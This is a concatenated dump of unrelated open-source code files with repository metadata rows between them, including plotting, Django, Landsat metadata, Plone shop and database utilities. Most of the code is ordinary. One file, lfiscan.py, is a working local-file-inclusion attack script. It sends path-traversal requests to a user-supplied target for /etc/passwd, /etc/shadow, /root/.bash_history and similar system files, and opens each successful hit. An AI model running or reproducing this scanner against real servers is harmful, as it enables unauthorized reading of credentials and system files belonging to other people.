dgroup.add_argument('--col', '-c', action="append", dest='cols',
type=int, default=list(),
help="Specify which columns to investigate. "
"Repeat if needed. Default: All")
dgroup.add_argument('--ignore-first', '-i', action="store_true",
default=False, help="ignore first line")
dgroup.add_argument('--sep', '-s', default=' ',
help="Specify separator, default: space")
fgroup = parser.add_argument_group("Formatting...")
fgroup.add_argument('--gap', '-g', type=float, default=0.01,
help="inverted number of subpoints in lines")
fgroup.add_argument('--not-implemented')
if args:
self.args = parser.parse_args(args)
else:
self.args = parser.parse_args()
return
def process(self):
"""Do the real work"""
ctr = 0
olds = None
pcontainer = list()
self.plot = NaivePlot(xmin=-0.1, ymin=-0.1)
for line in self.handle:
ctr += 1
if ctr == 1 and self.args.ignore_first:
continue
values = [float(val.strip()) for val in \
line.strip().split(self.args.sep) if val]
x = float(ctr)
if self.args.xy:
x = float(values[0])
points = [Point(x, val) for val in values if x and val]
pcontainer.append(points)
if olds:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
if not olds[i] or not points[i]:
continue
l = Line(olds[i], points[i])
(_, lchar, lcol) = self.get_format(i)
self.plot.add_curve(Curve(l, 0.0, 1.0, self.args.gap),
lchar, lcol)
olds = points
(xmin, xmax, ymin, ymax) = (0, 0, 0, 0)
for points in pcontainer:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
(pchar, _, pcol) = self.get_format(i)
self.plot.add_curve(points[i], pchar, pcol)
xmin = min(xmin, points[i].x)
xmax = max(xmax, points[i].x)
ymin = min(ymin, points[i].y)
ymax = max(ymax, points[i].y)
self.plot.zoom(xmin, xmax, ymin, ymax)
return
def __str__(self):
"""just print"""
return str(self.plot)
if __name__ == "__main__":
npp = NaiveParserPlotter()
npp.parse_args()
npp.setup()
npp.process()
print npp
|
gpl-3.0
| -1,404,144,900,113,913,000
| 32.156863
| 79
| 0.500099
| false
| 4.131107
| false
| false
| false
|
cpodlesny/lisbon
|
src/gallery/views.py
|
1
|
7355
|
from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.urlresolvers import reverse
from django.shortcuts import render, redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from helpers.models import Helpers
from offer.models import OfferCategory
from tours.models import Category
from .forms import GalleryForm
from .models import Gallery
def get_lang(request):
lang = request.LANGUAGE_CODE
return lang
def get_company():
return Helpers.objects.get(id=1).company_name
def gallery_list(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
queryset_list = Gallery.objects.all()
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '#', 'name': _('Gallery'), 'active': True}
]
paginator = Paginator(queryset_list, 6)
page_request_var = 'page'
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
queryset = paginator.page(1)
except EmptyPage:
queryset = paginator.page(paginator.num_pages)
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery'),
'breadcrumbs': breadcrumbs,
'object_list': queryset,
'page_request_var': page_request_var,
}
return render(request, 'partials/gallery.html', context)
def gallery_detail(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
gallery = Gallery.objects.get(pk=pk)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
gallery_description = {
'pt': gallery.description_PT,
'en': gallery.description_EN,
'de': gallery.description_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
gallery_current = {
'title': gallery_title[lang],
'description': gallery_description[lang],
'id': gallery.id,
'video': gallery.video,
'img': gallery.img,
'img1': gallery.img_1,
'img2': gallery.img_2,
'img3': gallery.img_3,
}
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'breadcrumbs': breadcrumbs,
'title': gallery_title[lang],
'object': gallery_current,
}
return render(request, 'templates/_gallery_details.html', context)
def gallery_update(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
gallery = get_object_or_404(Gallery, pk=pk)
lang = get_lang(request)
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
form = GalleryForm(request.POST or None, request.FILES or None, instance=gallery)
if form.is_valid():
gallery = form.save(commit=False)
gallery.save()
messages.success(request, _('Gallery edited'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery edit'),
'breadcrumbs': breadcrumbs,
'instance': gallery,
'form': form,
'value': _('Add'),
}
return render(request, 'templates/_form.html', context)
def gallery_create(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
form = GalleryForm(request.POST or None, request.FILES or None)
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': _('Create Gallery'), 'active': True}
]
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
messages.success(request, _('Gallery created'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Create Gallery'),
'breadcrumbs': breadcrumbs,
'value': _('Add'),
'form': form
}
return render(request, 'templates/_form.html', context)
def gallery_delete(request, pk=None):
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
instance = get_object_or_404(Gallery, pk=pk)
instance.delete()
messages.success(request, _('Gallery deleted'))
return redirect('gallery:list')
|
mit
| 9,215,973,351,278,447,000
| 31.982063
| 89
| 0.55758
| false
| 3.673826
| false
| false
| false
|
ceos-seo/Data_Cube_v2
|
agdc-v2/utils/usgslsprepare.py
|
1
|
8328
|
# coding=utf-8
"""
Ingest data from the command-line.
"""
from __future__ import absolute_import, division
import logging
import uuid
from xml.etree import ElementTree
import re
from pathlib import Path
import yaml
from dateutil import parser
from datetime import timedelta
import rasterio.warp
import click
from osgeo import osr
import os
# image boundary imports
import rasterio
from rasterio.errors import RasterioIOError
import rasterio.features
import shapely.affinity
import shapely.geometry
import shapely.ops
_STATIONS = {'023': 'TKSC', '022': 'SGS', '010': 'GNC', '011': 'HOA',
'012': 'HEOC', '013': 'IKR', '014': 'KIS', '015': 'LGS',
'016': 'MGR', '017': 'MOR', '032': 'LGN', '019': 'MTI', '030': 'KHC',
'031': 'MLK', '018': 'MPS', '003': 'BJC', '002': 'ASN', '001': 'AGS',
'007': 'DKI', '006': 'CUB', '005': 'CHM', '004': 'BKT', '009': 'GLC',
'008': 'EDC', '029': 'JSA', '028': 'COA', '021': 'PFS', '020': 'PAC'}
###IMAGE BOUNDARY CODE
def safe_valid_region(images, mask_value=None):
try:
return valid_region(images, mask_value)
except (OSError, RasterioIOError):
return None
def valid_region(images, mask_value=None):
mask = None
for fname in images:
## ensure formats match
with rasterio.open(str(fname), 'r') as ds:
transform = ds.affine
img = ds.read(1)
if mask_value is not None:
new_mask = img & mask_value == mask_value
else:
new_mask = img != ds.nodata
if mask is None:
mask = new_mask
else:
mask |= new_mask
shapes = rasterio.features.shapes(mask.astype('uint8'), mask=mask)
shape = shapely.ops.unary_union([shapely.geometry.shape(shape) for shape, val in shapes if val == 1])
# convex hull
geom = shape.convex_hull
# buffer by 1 pixel
geom = geom.buffer(1, join_style=3, cap_style=3)
# simplify with 1 pixel radius
geom = geom.simplify(1)
# intersect with image bounding box
geom = geom.intersection(shapely.geometry.box(0, 0, mask.shape[1], mask.shape[0]))
# transform from pixel space into CRS space
geom = shapely.affinity.affine_transform(geom, (transform.a, transform.b, transform.d,
transform.e, transform.xoff, transform.yoff))
output = shapely.geometry.mapping(geom)
output['coordinates'] = _to_lists(output['coordinates'])
return output
def _to_lists(x):
"""
Returns lists of lists when given tuples of tuples
"""
if isinstance(x, tuple):
return [_to_lists(el) for el in x]
return x
###END IMAGE BOUNDARY CODE
def band_name(path):
name = path.stem
position = name.find('_')
if position == -1:
raise ValueError('Unexpected tif image in eods: %r' % path)
if re.match(r"[Bb]\d+", name[position+1:]):
layername = name[position+2:]
else:
layername = name[position+1:]
return layername
def get_projection(path):
with rasterio.open(str(path)) as img:
left, bottom, right, top = img.bounds
return {
'spatial_reference': str(str(getattr(img, 'crs_wkt', None) or img.crs.wkt)),
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
}
}
def get_coords(geo_ref_points, spatial_ref):
spatial_ref = osr.SpatialReference(spatial_ref)
t = osr.CoordinateTransformation(spatial_ref, spatial_ref.CloneGeogCS())
def transform(p):
lon, lat, z = t.TransformPoint(p['x'], p['y'])
return {'lon': lon, 'lat': lat}
return {key: transform(p) for key, p in geo_ref_points.items()}
def populate_coord(doc):
proj = doc['grid_spatial']['projection']
doc['extent']['coord'] = get_coords(proj['geo_ref_points'], proj['spatial_reference'])
def crazy_parse(timestr):
try:
return parser.parse(timestr)
except ValueError:
if not timestr[-2:] == "60":
raise
return parser.parse(timestr[:-2]+'00') + timedelta(minutes=1)
def prep_dataset(fields, path):
images_list = []
for file in os.listdir(str(path)):
if file.endswith(".xml") and (not file.endswith('aux.xml')):
metafile = file
if file.endswith(".tif") and ("band" in file) :
images_list.append(os.path.join(str(path),file))
with open(os.path.join(str(path), metafile)) as f:
xmlstring = f.read()
xmlstring = re.sub(r'\sxmlns="[^"]+"', '', xmlstring, count=1)
doc = ElementTree.fromstring(xmlstring)
satellite = doc.find('.//satellite').text
instrument = doc.find('.//instrument').text
acquisition_date = doc.find('.//acquisition_date').text.replace("-", "")
scene_center_time = doc.find('.//scene_center_time').text[:8]
center_dt = crazy_parse(acquisition_date + "T" + scene_center_time)
aos = crazy_parse(acquisition_date + "T" + scene_center_time) - timedelta(seconds=(24 / 2))
los = aos + timedelta(seconds=24)
lpgs_metadata_file = doc.find('.//lpgs_metadata_file').text
groundstation = lpgs_metadata_file[16:19]
fields.update({'instrument': instrument, 'satellite': satellite})
start_time = aos
end_time = los
images = {band_name(im_path): {
'path': str(im_path.relative_to(path))
} for im_path in path.glob('*.tif')}
projdict = get_projection(path/next(iter(images.values()))['path'])
projdict['valid_data'] = safe_valid_region(images_list)
doc = {
'id': str(uuid.uuid4()),
'processing_level': fields["level"],
'product_type': fields["type"],
'creation_dt': fields["creation_dt"],
'platform': {'code': fields["satellite"]},
'instrument': {'name': fields["instrument"]},
'acquisition': {
'groundstation': {
'name': groundstation,
'aos': str(aos),
'los': str(los)
}
},
'extent': {
'from_dt': str(start_time),
'to_dt': str(end_time),
'center_dt': str(center_dt)
},
'format': {'name': 'GeoTiff'},
'grid_spatial': {
'projection': projdict
},
'image': {
'satellite_ref_point_start': {'path': int(fields["path"]), 'row': int(fields["row"])},
'satellite_ref_point_end': {'path': int(fields["path"]), 'row': int(fields["row"])},
'bands': images
},
'lineage': {'source_datasets': {}}
}
populate_coord(doc)
return doc
def dataset_folder(fields):
fmt_str = "{vehicle}_{instrument}_{type}_{level}_GA{type}{product}-{groundstation}_{path}_{row}_{date}"
return fmt_str.format(**fields)
def prepare_datasets(nbar_path):
fields = re.match(
(
r"(?P<code>LC8|LE7|LT5)"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"(?P<productyear>[0-9]{4})"
r"(?P<julianday>[0-9]{3})"
), nbar_path.stem).groupdict()
timedelta(days=int(fields["julianday"]))
fields.update({'level': 'sr_refl',
'type': 'LEDAPS',
'creation_dt': ((crazy_parse(fields["productyear"]+'0101T00:00:00'))+timedelta(days=int(fields["julianday"])))})
nbar = prep_dataset(fields, nbar_path)
return (nbar, nbar_path)
@click.command(help="Prepare USGS LS dataset for ingestion into the Data Cube.")
@click.argument('datasets',
type=click.Path(exists=True, readable=True, writable=True),
nargs=-1)
def main(datasets):
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
for dataset in datasets:
path = Path(dataset)
logging.info("Processing %s", path)
documents = prepare_datasets(path)
dataset, folder = documents
yaml_path = str(folder.joinpath('agdc-metadata.yaml'))
logging.info("Writing %s", yaml_path)
with open(yaml_path, 'w') as stream:
yaml.dump(dataset, stream)
if __name__ == "__main__":
main()
|
apache-2.0
| 6,611,207,923,284,716,000
| 30.908046
| 131
| 0.570725
| false
| 3.42716
| false
| false
| false
|
3t1n/scripts
|
Python/LFI-Scan/lfiscan.py
|
1
|
1102
|
#!/usr/bin/env python
#coding: utf-8
#coded by et1m
__author__ = "et1m"
print' _ ______ _____ _____ _____ _ _ '
print'| | | ____|_ _| / ____|/ ____| /\ | \ | |'
print'| | | |__ | | | (___ | | / \ | \| |'
print'| | | __| | | \___ \| | / /\ \ | . ` |'
print'| |____| | _| |_ ____) | |____ / ____ \| |\ |'
print'|______|_| |_____| |_____/ \_____/_/ \_\_| \_|'
print ''
print ''
import requests
import webbrowser
print 'Use em servidores que rodam Linux'
alvo = raw_input("digite seu alvo: ")
print''
cd = raw_input("digite os ../ : " )
print ''
print("Você digitou: " + alvo + cd)
print ''
paginas = ['/etc/passwd','/etc/issue','/proc/version','/etc/profile','/etc/shadow','/root/.bash_history','/var/log/dmessage','/var/mail/root','/var/spool/cron/crontabs/root']
for x in paginas:
check = requests.get(alvo + cd + x)
if check.status_code == 200: #se o get der certo então abre o browser com o url completo
webbrowser.open(alvo + cd + x)
|
cc0-1.0
| 2,690,219,767,311,702,000
| 31.352941
| 174
| 0.427273
| false
| 2.682927
| false
| false
| false
|
andreesg/bda.plone.shop
|
src/bda/plone/shop/dx.py
|
1
|
14904
|
# -*- coding: utf-8 -*-
from bda.plone.cart import CartItemDataProviderBase
from bda.plone.cart import CartItemPreviewAdapterBase
from bda.plone.cart.interfaces import ICartItemStock
from bda.plone.orders.interfaces import IBuyable
from bda.plone.orders.interfaces import ITrading
from bda.plone.shipping.interfaces import IShippingItem
from bda.plone.shop import message_factory as _
from bda.plone.shop.interfaces import IBuyablePeriod
from bda.plone.shop.mailnotify import BubbleGlobalNotificationText
from bda.plone.shop.mailnotify import BubbleItemNotificationText
from bda.plone.shop.utils import get_shop_article_settings
from bda.plone.shop.utils import get_shop_settings
from bda.plone.shop.utils import get_shop_shipping_settings
from bda.plone.shop.utils import get_shop_tax_settings
from plone.autoform.interfaces import IFormFieldProvider
from plone.dexterity.interfaces import IDexterityContent
from plone.supermodel import model
from zope import schema
from zope.component import adapter
from zope.component import getUtility
from zope.interface import implementer
from zope.interface import provider
from zope.schema.interfaces import IContextAwareDefaultFactory
from zope.schema.interfaces import IVocabularyFactory
@provider(IContextAwareDefaultFactory)
def default_item_net(context):
return get_shop_article_settings().default_item_net
@provider(IContextAwareDefaultFactory)
def default_item_vat(context):
return get_shop_tax_settings().default_item_vat
@provider(IContextAwareDefaultFactory)
def default_item_display_gross(context):
return get_shop_settings().default_item_display_gross
@provider(IContextAwareDefaultFactory)
def item_comment_enabled(context):
return get_shop_article_settings().default_item_comment_enabled
@provider(IContextAwareDefaultFactory)
def default_item_comment_required(context):
return get_shop_article_settings().default_item_comment_required
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit_float(context):
return get_shop_article_settings().default_item_quantity_unit_float
@provider(IContextAwareDefaultFactory)
def default_item_cart_count_limit(context):
return get_shop_article_settings().default_item_cart_count_limit
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit(context):
return get_shop_article_settings().default_item_quantity_unit
@provider(IFormFieldProvider)
class IBuyableBehavior(model.Schema, IBuyable):
"""Buyable behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_net',
'item_vat',
'item_cart_count_limit',
'item_display_gross',
'item_comment_enabled',
'item_comment_required',
'item_quantity_unit_float',
'item_quantity_unit'
]
)
item_net = schema.Float(
title=_(u'label_item_net', default=u'Item net price'),
required=False,
defaultFactory=default_item_net
)
item_vat = schema.Choice(
title=_(u'label_item_vat', default=u'Item VAT (in %)'),
vocabulary='bda.plone.shop.vocabularies.VatVocabulary',
required=False,
defaultFactory=default_item_vat
)
item_cart_count_limit = schema.Float(
title=_(u'label_item_cart_count_limit',
default=u'Max count of this item in cart'),
required=False,
defaultFactory=default_item_cart_count_limit
)
item_display_gross = schema.Bool(
title=_(u'label_item_display_gross', default=u'Display Gross Price'),
description=_(u'help_item_display_gross',
default=u'Show price with taxes included'),
required=False,
defaultFactory=default_item_display_gross
)
item_comment_enabled = schema.Bool(
title=_(u'label_item_comment_enabled', default='Comment enabled'),
required=False,
defaultFactory=item_comment_enabled
)
item_comment_required = schema.Bool(
title=_(u'label_item_comment_required', default='Comment required'),
required=False,
defaultFactory=default_item_comment_required
)
item_quantity_unit_float = schema.Bool(
title=_(
u'label_item_quantity_unit_float', default='Quantity as float'),
required=False,
defaultFactory=default_item_quantity_unit_float
)
item_quantity_unit = schema.Choice(
title=_(u'label_item_quantity_unit', default='Quantity unit'),
vocabulary='bda.plone.shop.vocabularies.QuantityUnitVocabulary',
required=False,
defaultFactory=default_item_quantity_unit
)
@adapter(IBuyableBehavior)
class DXCartItemDataProvider(CartItemDataProviderBase):
"""Accessor Interface
"""
@property
def net(self):
val = self.context.item_net
if not val:
return 0.0
return float(val)
@property
def vat(self):
val = self.context.item_vat
if not val:
return 0.0
return float(val)
@property
def cart_count_limit(self):
return self.context.item_cart_count_limit
@property
def display_gross(self):
return self.context.item_display_gross
@property
def comment_enabled(self):
return self.context.item_comment_enabled
@property
def comment_required(self):
return self.context.item_comment_required
@property
def quantity_unit_float(self):
return self.context.item_quantity_unit_float
@property
def quantity_unit(self):
unit = self.context.item_quantity_unit
vocab = getUtility(
IVocabularyFactory,
'bda.plone.shop.vocabularies.QuantityUnitVocabulary')(self.context)
for term in vocab:
if unit == term.value:
return term.title
@provider(IContextAwareDefaultFactory)
def default_item_display_stock(context):
return True
@provider(IContextAwareDefaultFactory)
def default_item_stock_warning_threshold(context):
return get_shop_article_settings().default_item_stock_warning_threshold
@provider(IFormFieldProvider)
class IStockBehavior(model.Schema):
"""Stock behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_display_stock',
'item_available',
'item_overbook',
'item_stock_warning_threshold'
]
)
item_display_stock = schema.Bool(
title=_(u'label_item_display_stock', default=u'Display item stock'),
required=False,
defaultFactory=default_item_display_stock
)
item_available = schema.Float(
title=_(u'label_item_available', default=u'Item stock available'),
required=False
)
item_overbook = schema.Float(
title=_(u'label_item_overbook', default=u'Item stock overbook'),
required=False
)
item_stock_warning_threshold = schema.Float(
title=_(u'label_item_stock_warning_threshold',
default=u'Item stock warning threshold.'),
required=False,
defaultFactory=default_item_stock_warning_threshold
)
@implementer(ICartItemStock)
@adapter(IStockBehavior)
class DXCartItemStock(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def display(self):
return self.context.item_display_stock
@property
def available(self):
return self.context.item_available
@available.setter
def available(self, value):
self.context.item_available = value
@property
def overbook(self):
return self.context.item_overbook
@overbook.setter
def overbook(self, value):
self.context.item_overbook = value
@property
def stock_warning_threshold(self):
return self.context.item_stock_warning_threshold
@stock_warning_threshold.setter
def stock_warning_threshold(self, value):
self.context.item_stock_warning_threshold = value
@provider(IContextAwareDefaultFactory)
def default_shipping_item_shippable(context):
return get_shop_shipping_settings().default_shipping_item_shippable
@provider(IFormFieldProvider)
class IShippingBehavior(model.Schema):
"""Shipping behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'shipping_item_shippable',
'shipping_item_weight',
'shipping_item_free_shipping'
]
)
shipping_item_shippable = schema.Bool(
title=_(u'label_shipping_item_shippable', default=u'Item Shippable'),
description=_('help_shipping_item_shippable',
default=u'Flag whether item is shippable, i.e. '
u'downloads are not'),
defaultFactory=default_shipping_item_shippable
)
shipping_item_weight = schema.Float(
title=_(u'label_shipping_item_weight', default=u'Item Weight'),
required=False
)
shipping_item_free_shipping = schema.Bool(
title=_(u'label_shipping_item_free_shipping',
default=u'Free Shipping'),
description=_('help_shipping_item_free_shipping',
default=u'Flag whether shipping of this item is free.')
)
@implementer(IShippingItem)
@adapter(IShippingBehavior)
class DXShippingItem(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def shippable(self):
return self.context.shipping_item_shippable
@property
def weight(self):
return self.context.shipping_item_weight
@property
def free_shipping(self):
return self.context.shipping_item_free_shipping
@adapter(IDexterityContent)
class DXCartItemPreviewImage(CartItemPreviewAdapterBase):
"""Accessor Interface
"""
preview_scale = "tile"
@property
def url(self):
"""Get url of preview image by trying to read the 'image' field on the
context.
"""
img_scale = None
if hasattr(self.context, 'image'):
scales = self.context.restrictedTraverse('@@images')
img_scale = scales.scale("image", scale=self.preview_scale)
return img_scale and img_scale.url or ""
@provider(IFormFieldProvider)
class IItemNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'order_text',
'overbook_text'])
order_text = schema.Text(
title=_(
u"label_item_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail"
),
required=False
)
overbook_text = schema.Text(
title=_(
u"label_item_overbook_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail if item is out of stock"
),
required=False
)
@provider(IFormFieldProvider)
class IGlobalNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'global_order_text',
'global_overbook_text'])
global_order_text = schema.Text(
title=_(
u"label_item_global_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item"
),
required=False
)
global_overbook_text = schema.Text(
title=_(
u"label_item_global_overbook_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item ordered if out of stock"
),
required=False
)
@adapter(IItemNotificationTextBehavior)
class DXItemNotificationText(BubbleItemNotificationText):
"""Accessor Interface
"""
@property
def order_text(self):
if self.context.order_text:
return self.context.order_text
return super(DXItemNotificationText, self).order_text
@property
def overbook_text(self):
if self.context.overbook_text:
return self.context.overbook_text
return super(DXItemNotificationText, self).overbook_text
@adapter(IGlobalNotificationTextBehavior)
class DXGlobalNotificationText(BubbleGlobalNotificationText):
"""Accessor Interface
"""
@property
def global_order_text(self):
if self.context.global_order_text:
return self.context.global_order_text
return super(DXGlobalNotificationText, self).global_order_text
@property
def global_overbook_text(self):
if self.context.global_overbook_text:
return self.context.global_overbook_text
return super(DXGlobalNotificationText, self).global_overbook_text
@provider(IFormFieldProvider)
class IBuyablePeriodBehavior(model.Schema):
"""Buyable period behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'buyable_effective',
'buyable_expires'
]
)
buyable_effective = schema.Datetime(
title=_(u'label_buyable_effective_date',
default=u'Buyable effective date'),
required=False
)
buyable_expires = schema.Datetime(
title=_(u'label_buyable_expiration_date',
default=u'Buyable expiration date'),
required=False
)
@implementer(IBuyablePeriod)
@adapter(IBuyablePeriodBehavior)
class DXBuyablePeriod(object):
def __init__(self, context):
self.context = context
@property
def effective(self):
return self.context.buyable_effective
@property
def expires(self):
return self.context.buyable_expires
@provider(IFormFieldProvider)
class ITradingBehavior(model.Schema):
"""Trading behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_number',
'gtin',
]
)
item_number = schema.TextLine(
title=_(u'label_item_number', default=u'Item number'),
description=_(u'help_item_number',
default=u'Buyable Item number'),
required=False)
gtin = schema.TextLine(
title=_(u'label_gtin', default=u'GTIN'),
description=_(u'help_gtin',
default=u'Global Trade Item Number'),
required=False)
@implementer(ITrading)
@adapter(ITradingBehavior)
class DXTrading(object):
def __init__(self, context):
self.context = context
@property
def item_number(self):
return self.context.item_number
@property
def gtin(self):
return self.context.gtin
|
bsd-3-clause
| 5,413,968,990,627,828,000
| 26.651206
| 81
| 0.653784
| false
| 3.932454
| false
| false
| false
|
drix00/pymcxray
|
pymcxray/multipleloop.py
|
1
|
3786
|
#!/usr/bin/env python
"""
This module provides a tool for handling computer experiments with
of a set of input parameters, where each input parameter
is varied in a prescribed fashion.
In short, the parameters are held in a dictionary where the keys are
the names of the parameters and the values are the numerical, string
or other values of the parameters. The value can take on multiple
values: e.g., an integer parameter 'a' can have values -1, 1 and
10. Similarly, a string parameter 'method' can have values 'Newton'
and 'Bisection'. The module will generate all combination of all
parameters and values, which in the mentioned example will be
(-1, 'Newton'), (1, 'Newton'), (10, 'Newton'), (-1, 'Bisection'),
(1, 'Bisection'), and (10, 'Bisection'). Particular combination
of values can easily be removed.
The usage and implementation of the module are documented in the
book "Python Scripting for Computational Science" (H. P. Langtangen,
Springer, 2009), Chapter 12.1.
"""
# see also http://pyslice.sourceforge.net/HomePage
def _outer(a, b):
"""
Return the outer product/combination of two lists.
a is a multi- or one-dimensional list,
b is a one-dimensional list, tuple, NumPy array or scalar (new parameter)
Return: outer combination 'all_combination'.
The function is to be called repeatedly::
all = _outer(all, p)
"""
all_combination = []
if not isinstance(a, list):
raise TypeError('a must be a list')
if isinstance(b, (float,int,complex,str)): b = [b] # scalar?
if len(a) == 0:
# first call:
for j in b:
all_combination.append([j])
else:
for j in b:
for i in a:
if not isinstance(i, list):
raise TypeError('a must be list of list')
# note: i refers to a list; i.append(j) changes
# the underlying list (in a), which is not what
# we want, we need a copy, extend the copy, and
# add to all_combination
k = i + [j] # extend previous prms with new one
all_combination.append(k)
return all_combination
def combine(prm_values):
"""
Compute the combination of all parameter values in the prm_values
(nested) list. Main function in this module.
param prm_values: nested list ``(parameter_name, list_of_parameter_values)``
or dictionary ``prm_values[parameter_name] = list_of_parameter_values``.
return: (all, names, varied) where
- all contains all combinations (experiments)
all[i] is the list of individual parameter values in
experiment no i
- names contains a list of all parameter names
- varied holds a list of parameter names that are varied
(i.e. where there is more than one value of the parameter,
the rest of the parameters have fixed values)
Code example:
>>> dx = array([1.0/2**k for k in range(2,5)])
>>> dt = 3*dx; dt = dt[:-1]
>>> p = {'dx': dx, 'dt': dt}
>>> p
{'dt': [ 0.75 , 0.375,], 'dx': [ 0.25 , 0.125 , 0.0625,]}
>>> all, names, varied = combine(p)
>>> all
[[0.75, 0.25], [0.375, 0.25], [0.75, 0.125], [0.375, 0.125],
[0.75, 0.0625], [0.375, 0.0625]]
"""
if isinstance(prm_values, dict):
# turn dict into list [(name,values),(name,values),...]:
prm_values = [(name, prm_values[name]) \
for name in prm_values]
all_combination = []
varied = []
for name, values in prm_values:
all_combination = _outer(all_combination, values)
if isinstance(values, list) and len(values) > 1:
varied.append(name)
names = [name for name, values in prm_values]
return all_combination, names, varied
|
apache-2.0
| -5,109,418,296,811,559,000
| 36.86
| 80
| 0.622557
| false
| 3.59203
| false
| false
| false
|
oas89/iktomi
|
iktomi/db/sqla/__init__.py
|
1
|
1417
|
# -*- coding: utf-8 -*-
import logging
from importlib import import_module
from sqlalchemy import orm, create_engine
from sqlalchemy.orm.query import Query
def multidb_binds(databases, package=None, engine_params=None):
'''Creates dictionary to be passed as `binds` parameter to
`sqlalchemy.orm.sessionmaker()` from dictionary mapping models module name
to connection URI that should be used for these models. Models module must
have `metadata` attribute. `package` when set must be a package or package
name for all models modules.'''
engine_params = engine_params or {}
if not (package is None or isinstance(package, basestring)):
package = getattr(package, '__package__', None) or package.__name__
binds = {}
for ref, uri in databases.items():
md_ref = '.'.join(filter(None, [package, ref]))
md_module = import_module(md_ref)
try:
metadata = md_module.metadata
except AttributeError:
raise ImportError(
'Cannot import name metadata from module {}'.format(md_ref))
engine = create_engine(uri, **engine_params)
# Dot before [name] is required to allow setting logging level etc. for
# all them at once.
engine.logger = logging.getLogger('sqlalchemy.engine.[%s]' % ref)
for table in metadata.sorted_tables:
binds[table] = engine
return binds
|
mit
| -3,956,359,092,296,895,000
| 41.939394
| 79
| 0.661962
| false
| 4.36
| false
| false
| false
|
vkuznet/rep
|
rep/data/storage.py
|
1
|
5284
|
"""
This is wrapper for pandas.DataFrame, which allows you to define dataset for estimator in a simple way.
"""
from __future__ import division, print_function, absolute_import
import numbers
from numpy.random.mtrand import RandomState
import pandas
import numpy
from sklearn.utils import check_random_state
from ..utils import get_columns_dict, get_columns_in_df
# generating random seeds in the interval [0, RANDINT)
RANDINT = 10000000
class LabeledDataStorage(object):
"""
